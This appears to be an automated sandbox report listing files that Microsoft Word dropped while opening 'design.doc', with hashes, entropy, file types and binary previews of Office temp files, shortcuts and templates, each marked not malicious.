                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: 2, Template: Normal, Last Saved By: Work, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 12:00, Last Printed: Sat Nov 18 08:37:00 2023, Create Time/Date: Fri Apr 19 09:09:00 2024, Last Saved Time/Date: Fri Apr 19 09:09:00 2024, Number of Pages: 2, Number of Words: 2596, Number of Characters: 1480, Security: 0
                            Category:dropped
                            Size (bytes):301568
                            Entropy (8bit):4.718878602172557
                            Encrypted:false
                            SSDEEP:6144:EXtV51A/MJ24joOVLxJ37U0kPT7GSwnWu9ECStSMI337Wj3jXmWau5xbsI2wHFZK:RpSq5
                            MD5:E66C841554523C7B2ADD768650B412F6
                            SHA1:8726633918B79C2F3AEE81C5324AA8C3CC0B0A23
                            SHA-256:B66385AECD02830F61CA5A8768EA137D3469D6664BA43166C0023621C78BD4FB
                            SHA-512:52CA2BF306CB68CBAE3FF63C3EC31F0AE2F99533DAC1BD41734FFCE4A0C24C3B57E5BE2FDCDB004446CCD21485DAE390E03016BFC4CD1FC866556E6C98895C64
                            Malicious:false
                            Preview:......................>.......................O...........R...............N...U...V...W...X........................................................................................................................................................................................................................................................................................................................................................................................................................................"......................;....bjbj*.*.......................4B..H|..H|....................................................................................".......".......................................................................................T....................#......................................................'.......3.......["......]"......]"......]"......]"......]"......]"..$....$......@'..4...."..9...........t'.."...........;.....................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):30
                            Entropy (8bit):1.2389205950315936
                            Encrypted:false
                            SSDEEP:3:Lenlj:qn
                            MD5:060ACA3E81884D91D34C0C5B147216AA
                            SHA1:4A00D45F97DF030476F5F5A55E73A73A8173C988
                            SHA-256:8D5832283325FB0FC5B3C9B832755972A1E29CD7E190EB6863E6835D11EC673E
                            SHA-512:4CE4031816DAC52EABDA0A4D7345383EAA9FF6C8E539B0D9C24D089072CE44DDED1D121C613C073C21FCDBB94C6EFCA18FD04EA9317643CEEB68BC5C84A8313D
                            Malicious:false
                            Preview:.....{........................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Directory, ctime=Wed May 8 22:48:06 2024, mtime=Wed May 8 22:49:20 2024, atime=Wed May 8 22:49:20 2024, length=0, window=hide
                            Category:dropped
                            Size (bytes):1164
                            Entropy (8bit):4.6502828283623785
                            Encrypted:false
                            SSDEEP:24:8zWsaGcg0TrWVg6n0oG22hdQAAmuTqTrwbPqyFm:8zWYchNoUduTgrFyF
                            MD5:CCE1A47DB7603560D29F19C49DCD91E8
                            SHA1:AD85EC6BCCFB3D8EA4FA7AC9686F3566D06BA470
                            SHA-256:B18EF94AF3905D5BECEA07B1C183550109027D254797A221B0B6C0FB079EBCAF
                            SHA-512:77AF9AE202B04FDBD2A79CF2E26B47126DEDD213FC6018CC817FD3FF0B4AEDC456CC51BF3F687F56B0B2B92D9319DB554F36DD7EE399EBECF26E2D94C06D88D4
                            Malicious:false
                            Preview:L..................F...........,.....+.X.....f.X............................[....P.O. .:i.....+00.../C:\...................x.1.....CW;^..Users.d......OwH.X......................:.....K...U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1......X....user.<......CW.^.X............................{...j.o.n.e.s.....V.1.....CW.^..AppData.@......CW.^.X.............................%..A.p.p.D.a.t.a.....V.1......X....Roaming.@......CW.^.X............................`1..R.o.a.m.i.n.g.....\.1......X....MICROS~1..D......CW.^.X..............................e.M.i.c.r.o.s.o.f.t.....\.1......X+...TEMPLA~1..D......X...X+...............................T.e.m.p.l.a.t.e.s.......a...............-.......`............F.......C:\Users\user\AppData\Roaming\Microsoft\Templates........\.....\.T.e.m.p.l.a.t.e.s...........................>.e.L.:..er.=....`.......X.......579569...........hT..CrF.f4... .1J8......,.......hT..CrF.f4... .1J8......,..................1SPS.XF.L8C....&.m.q............/...S
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Oct 4 11:02:27 2023, mtime=Wed May 8 22:48:12 2024, atime=Wed May 8 22:48:04 2024, length=301568, window=hide
                            Category:dropped
                            Size (bytes):493
                            Entropy (8bit):4.7082999243370285
                            Encrypted:false
                            SSDEEP:6:4xtQl3PVoY2P1AlljlYKO7C/ZimSljAlDtxmwv2WTll7W+WimsQ1Im/avGmZp/t:8gVwAlZYKOgWjAB+Wpl7hgswb/BmV
                            MD5:CA25AE3F4A79596A9DDD65D5A5E63D8F
                            SHA1:8D8E6C65C8CCCCF49AF044CF344400CF7E0582F5
                            SHA-256:24A17299D27D57EA4FA1D507458B4EF1D06FE841640508703ED3606D4CD5C198
                            SHA-512:C90498AAF3C5749ACC4F57FCF32548066254B8EDA88DFEAA18B4E568BBAC0893F3FD1B0125DEAA850EC207C45518F4CB99C30F1E4D7F7D97519122027356D37F
                            Malicious:false
                            Preview:L..................F.... ...uQ......VR0.......+............................b.`.2......X.. .design.doc..F......DWN`.X............................o1..d.e.s.i.g.n...d.o.c.......P...............-.......O............F.......C:\Users\user\Desktop\design.doc..!.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.e.s.i.g.n...d.o.c.`.......X.......579569...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Generic INItialization configuration [folders]
                            Category:dropped
                            Size (bytes):63
                            Entropy (8bit):4.495402995939737
                            Encrypted:false
                            SSDEEP:3:M12LESm4+WMESpnbJlv:M0LEbWMEAv
                            MD5:359A994225F4A0D87882D5F2AA13068E
                            SHA1:408A3C1A921091C9FB9E41DF6D5701DE4FE85A44
                            SHA-256:4B6AEB7B2F406C8013C9A2FED3A503DD771196369ED1A7B1A423D07C59985B7F
                            SHA-512:5FBCBD4C228C0D527515721D6B58E65F6EEDA4CD792655F4C9CF113852425ABBA27E58872FF5778D360F71D3FD078AF7277C85FBFE54D654C667537790686332
                            Malicious:false
                            Preview:[doc]..design.LNK=0..[folders]..design.LNK=0..Templates.LNK=0..
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):562113
                            Entropy (8bit):7.67409707491542
                            Encrypted:false
                            SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                            MD5:4A1657A3872F9A77EC257F41B8F56B3D
                            SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                            SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                            SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                            Malicious:false
                            Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):1649585
                            Entropy (8bit):7.875240099125746
                            Encrypted:false
                            SSDEEP:24576:L368X6z95zf5BbQ6U79dYy2HiTIxRboyM/LZTl5KnCc:r68kb7UTYxGIxmnp65
                            MD5:35200E94CEB3BB7A8B34B4E93E039023
                            SHA1:5BB55EDAA4CDF9D805E36C36FB092E451BDDB74D
                            SHA-256:6CE04E8827ABAEA9B292048C5F84D824DE3CEFDB493101C2DB207BD4475AF1FD
                            SHA-512:ED80CEE7C22D10664076BA7558A79485AA39BE80582CEC9A222621764DAE5EFA70F648F8E8C5C83B6FE31C2A9A933C814929782A964A47157505F4AE79A3E2F9
                            Malicious:false
                            Preview:PK..........1A..u._....P......[Content_Types].xml..Ms.@.....!...=.7....;a.h.&Y..l..H~..`;...d..g/..e..,M..C...5...#g/."L..;...#. ]..f...w../._.2Y8..X.[..7._.[...K3..#.4......D.]l.?...~.&J&....p..wr-v.r.?...i.d.:o....Z.a|._....|.d...A....A".0.J......nz....#.s.m.......(.]........~..XC..J......+.|...(b}...K!._.D....uN....u..U..b=.^..[...f...f.,...eo..z.8.mz....."..D..SU.}ENp.k.e}.O.N....:^....5.d.9Y.N..5.d.q.^s..}R...._E..D...o..o...o...f.6;s.Z]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...S.....0.zN.... ...>..>..>..>..>..>..>........e...,..7...F(L.....>.ku...i...i...i...i...i...i...i........yi.....G...1.....j...r.Z]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o|^Z....Q}.;.o...9.Z..\.V...............................jZ......k.pT...0.zN.... ...>..>..>..>..>..>..>........e...,..7...f(L.....>.ku...i...i...i...i...i...i...i........yi.......n.....{.._f...0...PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):558035
                            Entropy (8bit):7.696653383430889
                            Encrypted:false
                            SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                            MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                            SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                            SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                            SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                            Malicious:false
                            Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):570901
                            Entropy (8bit):7.674434888248144
                            Encrypted:false
                            SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                            MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                            SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                            SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                            SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                            Malicious:false
                            Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):523048
                            Entropy (8bit):7.715248170753013
                            Encrypted:false
                            SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                            MD5:C276F590BB846309A5E30ADC35C502AD
                            SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                            SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                            SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                            Malicious:false
                            Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):3078052
                            Entropy (8bit):7.954129852655753
                            Encrypted:false
                            SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                            MD5:CDF98D6B111CF35576343B962EA5EEC6
                            SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                            SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                            SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                            Malicious:false
                            Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):777647
                            Entropy (8bit):7.689662652914981
                            Encrypted:false
                            SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                            MD5:B30D2EF0FC261AECE90B62E9C5597379
                            SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                            SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                            SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                            Malicious:false
                            Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                            Category:dropped
                            Size (bytes):924687
                            Entropy (8bit):7.824849396154325
                            Encrypted:false
                            SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                            MD5:97EEC245165F2296139EF8D4D43BBB66
                            SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                            SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                            SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                            Malicious:false
                            Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft OOXML
                            Category:dropped
                            Size (bytes):966946
                            Entropy (8bit):7.8785200658952
                            Encrypted:false
                            SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                            MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                            SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                            SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
